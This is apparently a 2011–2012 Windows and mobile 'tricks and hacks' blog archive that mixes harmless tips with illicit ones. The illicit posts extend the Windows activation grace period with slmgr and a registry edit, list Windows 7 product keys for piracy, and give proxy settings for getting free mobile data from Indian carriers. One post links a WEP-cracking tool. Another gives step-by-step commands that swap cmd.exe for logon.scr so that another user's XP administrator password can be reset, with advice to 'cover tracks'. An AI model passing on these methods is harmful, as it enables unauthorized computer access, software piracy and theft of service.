26 Jan 2012

Windows 7 Activation

Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without
activation. This is actually possible using the slmgr - rearm command which will extend the grace period from
30 days to 120 days. However in this post I will show you a small trick using which it is possible to use
Windows 7 without activation for approximately an year! Here is a way to do that.
1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt ” and select “Run as
Administrator“. If you are not the administrator then you are prompted to enter the password, or else you
can proceed to step-2.
2. Now type the following command and hit enter
slmgr -rearm
3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30
days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days
without activation.
4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry
Editor ( type regedit in “Run” and hit Enter) and navigate to the following location
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
5. In right-side pane, change value of SkipRearm to 1.
6. Now you will be able to use the slmgr - rearm command for another 8 times so that you can skip activation
process for another 240 days. So you will get 120 + 240 = 360 days of free Windows 7 usage.
120 days using “slmgr -rearm” command before registry edit
+
240 days using “slmgr -rearm” command after registry edit
= 360 Days

9 Nov 2011

Enjoy the text to voice trick on ur pc!

1.Open Notepad and copy and paste the following code into it
Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message
2.Now save the notepad file with the name speak.vbs at your desktop.
3.Now double click on speak.vbs type in the box whatever you want your
computer to speak for you.

22 Oct 2011

Win 7 CD Key

J7PYM-6X6FJ-QRKYT-TW4KF-BY7H9
D67PP-QBKVV-6FWDJ-4K2XB-D4684
HQDKC-F3P6D-C9YYM-HRB89-QDBB7
76DX2-7YMCQ-K2WCP-672K2-BK44W
2RG93-6XVFJ-RKHQ7-D2RTT-3FMQT
... TT63R-8JGWP-WWT97-R6WQC-4CVWY
YQJX6-D6TRM-VWBM7-PHDJK-YPXJH
Q7J7F-GQHBT-Q42RQ-2F8XV-2WKKM
KH4X7-JY8G7-RCD7G-BYDJW-YTPXH
WYBJ8-8QVP3-24R82-VV2VP-72Q9W
9DP2R-W78GJ-GJBKW-CKR46-H3WYT
CXB7F-WWCM4-BP9V3-2YH43-RK8Y6
W9BYV-K2TB8-4YDJT-QBQWP-KFDHB
WGDJW-B8DYC-WVKX4-6MKF4-B8PK8
2PHXF-9PBDW-D3WWY-CPDKD-XG87V

You can upgrade from build 7100
This build can also be activated with the following product keys :
Original M$ keys with Unlimited use.

RFFTV-J6K7W-MHBQJ-XYMMJ-Q8DCH
QXV7B-K78W2-QGPR6-9FWH9-KGMM7
GG4MQ-MGK72-HVXFW-KHCRF-KW6KY
4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH
6JKV2-QPB8H-RQ893-FW7TM-PBJ73
JYDV8-H8VXG-74RPT-6BJPB-X42V4
7XRCQ-RPY28-YY9P8-R6HD8-84GH3
482XP-6J9WR-4JXT3-VBPP6-FQF4M
D9RHV-JG8XC-C77H2-3YF6D-RYRJ9
TQ32R-WFBDM-GFHD2-QGVMH-3P9GC
K98KK-W2RF2-8JHT3-JBKM8-437GC
7YWX9-W3C2V-D46GW-P722P-9CP4D

*** en_windows_7_ultimate_x86_x15-65921

FHY4Q-VB63H-XK8VD-9Y68P-RFQ43
J6C9R-C9HHG-3CWTY-Y4MPW-CD72J

7|Ultimate|Acer|FJGCP-4DFJD-GJY49-VJBQ7-HYRR2
7|Ultimate|Dell|342DG-6YJR8-X92GV-V7DCV-P4K27
7|Ultimate|Lenovo|22TKD-F8XX6-YG69F-9M66D-PMJBM
7|Ultimate|Samsung|49PB6-6BJ6Y-KHGCQ-7DDY6-TF7CD
7|Ultimate|unknown|FHY4Q-VB63H-XK8VD-9Y68P-RFQ43
7|Ultimate|unknown|J6C9R-C9HHG-3CWTY-Y4MPW-CD72

19 Sept 2011

THE HACKERS ACRONYMS

THE HACKERS ACRONYMS
 if you like this post please click this advertisement on the right side of this post


===================================>>>>>>>>>>>>>>>>>>

THE HACKERS ACRONYMS.

The below files contains a list of acronyms which are predominately used by hackers.
Hope these files will help u.


<a href="http://uploading.com/files/bdm88223/THE%2BHACKERS%2BACRONYM.txt/">THE HACKERS ACRONYM.txt - 27.8 KB</a>

http://uploading.com/files/bdm88223/THE%2BHACKERS%2BACRONYM.txt/

18 Sept 2011

Free tv channels in bsnl 3G


DD Sports:
rtsp://10.220.68.10/rtpencoder/live3/ddsports_3g.sdp
IBN7:
... rtsp://10.220.68.10/rtpencoder/live10/ibn7_3g.sdp
Aajtak:
rtsp://10.220.68.10/rtpencoder/live21/aajtak_3g.sdp
B4u Music:
rtsp://10.220.68.10/rtpencoder/live21/aajtak_3g.sdp
DD1:
rtsp://10.220.68.10/rtpencoder/live5/ddnational_2g.sdp
ETC:
rtsp://10.220.68.10/rtpencoder/live12/etc_2g.sdp
DD NEWS:
rtsp://10.220.68.10/rtpencoder/live11/ddnews_3g.sdp
Filmy:
rtsp://10.220.68.10/rtpencoder/live27/filmi_3g.sdp
India tv:
rtsp://10.220.68.10/rtpencoder/live11/indiatv_3g.sdp
See More

Bsnl free missed call alert trick


Bsnl free missed call alert trick in 2g & 3g.This is not actually a trick it is provided by the network itself.But most of the bsnl customers are unaware of this offer from bsnl .Bsnl free missed call alert trick
Follow some simple steps to activate it.
Go to:
... >>settings
>>call
>>call divert
>>select the option divert if unreachable
>>activate call divert to this no:+9117010
you're done now u can enjoy free missed call alerts in bsnl for lifetime

Renaming the Start Button

To rename the start button, you will need a hex editor.
My preference is UltraEdit
1. Copy the \windows\explore.exe file to a new name (e.g. explorer_1.exe)
2. With the hex editor, open that file and go to offset 412b6
3. You will see the word start with blanks between each letter
4. Edit it be any 5 characters or less
5. Save the file
6. Boot to DOS
7. Copy the existing c:\windows\explorer.exe to explorer.org
8. Copy explorer_1.exe to explorer.exe
9. You will also need to replace the explorer.exe in the c:\windows\system32\dllcache file as well with the new one.
Note: If the partition is NTFS and you can't access the files from DOS:
1. Start Regedit
2. Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon.
3. Change the value of Shell from Explorer.exe to explorer_1.exe

how to create ur own Customized Run Command


The Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such as Command prompt (cmd), Calculator (calc) etc. So, have you ever wond...ered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.
CREATING THE CUSTOMIZED RUN COMMAND


Let me take up an example of how to create a customized run command for opening the Internet explorer. Once you create this command, you should be able to open the Internet explorer just by typing “ie” (without quotes) in the Run dialog box. Here is how you can do that.
1. Right click on your Desktop and select New -> Shortcut.
2. You will see a “Create Shortcut” Dialog box as shown below
3. Click on “Browse”, navigate to: Program Files -> Internet Explorer from your Root drive (usually C:\) and select “iexplore” as shown in the above figure and click on “OK”.
4. Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie”. Click on “Finish”.
5. You will see a shortcut named “ie” on your desktop. All you need to do is just copy this shortcut and paste it in your Windows folder (usually “C:/Windows”). Once you have copied the shortcut onto your Windows folder, you can delete the one on your Desktop.
6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.
In this way you can create customized Run commands for any program of your choice. Say “ff” for Firefox, “ym” for Yahoo messenger, “wmp” for Windows media player and so on.
To do this, when you click on “Browse” in the Step-3, just select the target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for this shortcut as per your choice and copy the shortcut file onto the Windows folder as usual. Now just type this short name in the Run dialog box to open the program.
I hope you like this post! Pass your comments.

WiFi Hacking


WiFi Hacking

Basic Directions:
1)Boot from cd
2)Get the wep key
... 3)Write it down
4)Reboot into windows
5)Connect using wep key.
WEP is an encryption scheme based on the RC-4 cipher that is available on all 802.11a b and g wireless products. WEP uses a set of bits called a key to scramble infmation in the data frames as it leaves the access point client adapter and the scrambled message is then decrypted by the receiver. Both sides must have the same WEP key which is usually a total of 64 128 bits long. A semi-random 24 bit number called an Initialization Vect (IV) is part of the key so a 64 bit WEP key actually contains only 40 bits of strong encryption while a 128 bit key has 104. The IV is placed in encrypted frames header and is transmitted in plain text.
Traditionally cracking WEP keys has been a slow and bing process. An attacker would have to capture hundreds of thousands millions of packets* a process that could take hours even days depending on the volume of traffic passing over the wireless netwk. After enough packets were captured a WEP cracking program such as Aircrack would be used to find the WEP key.

Download from filesonic.com
Code:
http://www.filesonic.com/file/486346441/WiFi_Slax_Wireless_Hacking.rar

How To Hide Partition Without any Software


Go to Start->Run.
Type DISKPART and press Enter.
In the console type list volume to see all the drives available on your PC.
... Now select the drive which you want to hide. Suppose you want to hide D see the volume number opposite to Ltr D.
In My PC it is volume 4 for drive D(might be different in your computer) .
Now to hide drive D type Select volume 4 .(Select the appropriate number according to your system)
Then type remove letter d , this will hide your drive.
Now to get your drive back type Select volume 4 and then type assign letter d .

16 Sept 2011

Free GPRS in Reliance Latest

Here is the latest 2011 Gprs trick for using free GPRS on Your reliance mobile.By using this free GPRS Trick you can surf and download unlimited by using your mobile.Just configure your mobile using below settings

Apn – rcomnet/smartnet
Ip – 69.171.240.119
Port- 80

After installing the above settings ,open opera handler and fill it with below settings

Primary Server – http://server4.operamini.com:80/
Secondary Server – socket://server4.operamini.com:1080/
Proxy Type – HTTP
Proxy Server – 69.171.240.119

Now enjoy unlimited browsing on your reliance connection

15 Sept 2011

Facebook Keyboard Shortcuts !

  Keyboard Shortcuts !


If you spend a lot of time on facebook then why not spend it more efficiently.There are a lot of browser specific keyboard shortcuts for facebook.You can create new messages,view account settings,View notifications etc .Once you get familiar with these shortcuts you can easily navigate on facebook.In this post I will give the shortcut keys for Google Chrome,Firefox and Internet Explorer.There is also a trick to create custom shortcuts keys for your computer programs
Here is a comprehensive list of facebook Shortcuts for each browser.



Google Chrome Facebook Shortcuts


  • Alt+1: View your News Feed
  • Alt+2: View your own Profile
  • Alt+3: View pop-up of friend requests
  • Alt+4: View pop-up of messages
  • Alt+5: View pop-up of notifications
  • Alt+6: View Account Settings
  • Alt+7: View Privacy Settings
  • Alt+8: View Facebook’s own profile
  • Alt+9: Read latest Terms of Service agreement.
  • Alt+?: Search
  • Alt+m: Compose a new message
If you are using Firefox browser then you also need to press SHIFT along with the above shortcut keys.


Firefox Facebook Shortcuts


  • Shift+Alt+1: View your News Feed
  • Shift+Alt+2: View your own Profile
  • Shift+Alt+3: View pop-up of friend requests
  • Shift+Alt+4: View pop-up of messages
  • Shift+Alt+5: View pop-up of notifications
  • Shift+Alt+6: View Account Settings
  • Shift+Alt+7: View Privacy Settings
  • Shift+Alt+8: View Facebook’s own profile
  • Shift+Alt+9: Read latest Terms of Service agreement.
  • Shift+Alt+0: Open Facebook Help Center
  • Shift+Alt+?: Search
  • Shift+Alt+m: Compose a new message
If you are using Internet Explorer then you you can use the Facebook shortcuts of Google chrome,but you have to press ENTER after each shortcut

Hack Windows XP Admin Passwords




This hack will only work if the person that owns the machine has no intelligence. This is how it works: When you or anyone installs Windows XP for the first time your asked to put in your username and up to five others. Now, unknownst to a lot of other people this is the only place in  Windows XP that you can password the default Administrator Diagnostic  Account. This means that to by pass most administrators accounts on Windows XP all you have to do is boot to safe mode by pressing F8 during boot up and choosing it. Log into the Administrator Account and create your own or change the password on the current Account.This only works if the user on setup specified a password for the Administrator Account.

This has worked for me on both Windows XP Home and Pro.

-----------------------------------------------------------------------------

Now this one seems to be machine dependant, it works randomly(don't know why)


If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work
on the welcome screen of a normal booted machine)

-----------------------------------------------------------------------------

cd\ *drops to root


cd\windows\system32 *directs to the system32 dir


mkdir temphack *creates the folder temphack


copy logon.scr temphack\logon.scr *backsup logon.scr


copy cmd.exe temphack\cmd.exe *backsup cmd.exe


del logon.scr *deletes original logon.scr


rename cmd.exe logon.scr *renames cmd.exe to logon.scr


exit *quits dos

-----------------------------------------------------------------------------

Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the  screen saver you will get an unprotected dos prompt with out logging into XP. Once this happens if you enter this command minus the quotes  "net user <admin account name here> password" If the Administrator Account is called Frank and you want the password blah enter this "net user Frank blah" and this changes the password on franks machine to blah and your in.

Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Multiple Desktops for Windows

Features:

Launch Desktops: Create multiple desktops on your computer.

Launch Apps: Open different applications on each separate virtual desktops to improve your productivity.

Name your space: label your tag for each virtual desktop, the tag is shown on the space switcher.

Change wallpaper: Your desktop is unique, Set a custom desktop image for each of your desktops and watch as the pictures fade into each other when switching between your desktops.

Color your space: If you don't like to set a custom image for each desktop, just set a background color for them.

Protect your space: If you don't like anonymous users to use your spaces, just set a password for them.

Hotkeys for everything: nSpaces has a group of hotkeys for each desktop you created, hotkey for the space switcher.You can change whatever you want.



Download nSpaces

3G HACK IN TATA DOCOMO

3G gives a better performance than 2G.But we are not using 2G due to its high cost.Here is the solution for your this problem you can now enjoy free 3G in your docomo tata connection.Its 100% free 3G in your docomo phone.This 3G hack can be used by any one who is having a phone with 3G supported and a docomo sim with 1 rupee balance.
Follow the below procedure to get free 3G in your tata docomo

  • create a new access point by going to connection settings.
  • Use the below settings for the access point.
Name : Tata Docomo or any
Access Point ( APN ) – tata.docomo.dive.in
Homepage : www.msgajjar.co.cc
Proxy : 202.87.41.147
Proxy Port : 8080
  • Download opera mini handler
  • Use the below settings for handler
  • Default setting dive in
  • Set http in Custom Field in your Opera Mini handler
  • Socket Server to http://203.115.112.5.server4.operamini.com OR http://10.124.72.171.server4.operamini.com
Keep Proxy Type as blank

Enjoy free 3G on Docomo....

BSNL 3G Hack Free Gprs In BSNL

It's time to hack BSNL 3G by using 2G sim.You need to get a new 2G sim card to access 3G in your connection.
Once you are ready with your new sim card you can go to access point settings and create a new access point with access point name as bsnlnet and leave all the other options as blank.Now save the access point and come back to the browser.In your browser goto wap.google.com and minimize the browser.
Now again goto settings->Phone->network and change network mode to UTMS.Now you are hacked BSNL 3G for free usage.You can now browse internet at 3G speed

Computer & Mobile Tricks And Tips: 5 Free Social Networking Apps for Android

Computer & Mobile Tricks And Tips: 5 Free Social Networking Apps for Android: Social Networking is now becoming the every day activity of people. By using such social networking sites, one can connect to his friends, ...

Computer & Mobile Tricks And Tips: BSNL 3G Hack Free Gprs In BSNL

Computer & Mobile Tricks And Tips: BSNL 3G Hack Free Gprs In BSNL: It's time to hack BSNL 3G by using 2G sim.You need to get a new 2G sim card to access 3G in your connection. Once you are ready with your ...

12 Aug 2011

HACKING and CYBER SECURITY: Hack email accounts or passwords using session coo...

HACKING and CYBER SECURITY: Hack email accounts or passwords using session coo...: "Hi friends, welcome back today i will explain you how to hack email accounts and passwords of almost each and every website using session co..."

HackingTricks: How to hack facebook account

HackingTricks: How to hack facebook account: "This is the question which i read daily in my inbox. All the people want to know how to hack face book account and i always suggest them to ..."

6 Aug 2011

HACKING and CYBER SECURITY: 15 Best Password Cracking Tools Collection

HACKING and CYBER SECURITY: 15 Best Password Cracking Tools Collection: "1. PDF Password Remover PDF Password recovers lost passwords to password-protected PDF files (*.pdf). PDF Password recovers user and p..."

HACKING and CYBER SECURITY: How to call your friends with their own number

HACKING and CYBER SECURITY: How to call your friends with their own number: "With useful prank to confuse your friends. With this mobile hack, you can call your friends with their own mobile number.... meaning by, the..."

HACKING and CYBER SECURITY: How to call your friends with their own number

HACKING and CYBER SECURITY: How to call your friends with their own number: "With useful prank to confuse your friends. With this mobile hack, you can call your friends with their own mobile number.... meaning by, the..."

HACKING and CYBER SECURITY: Sending Fake Emails to anyone

HACKING and CYBER SECURITY: Sending Fake Emails to anyone: " I have seen this being spammed over the net by script kiddies pretending that it allows faked emails to be sent to any phone number. Inde..."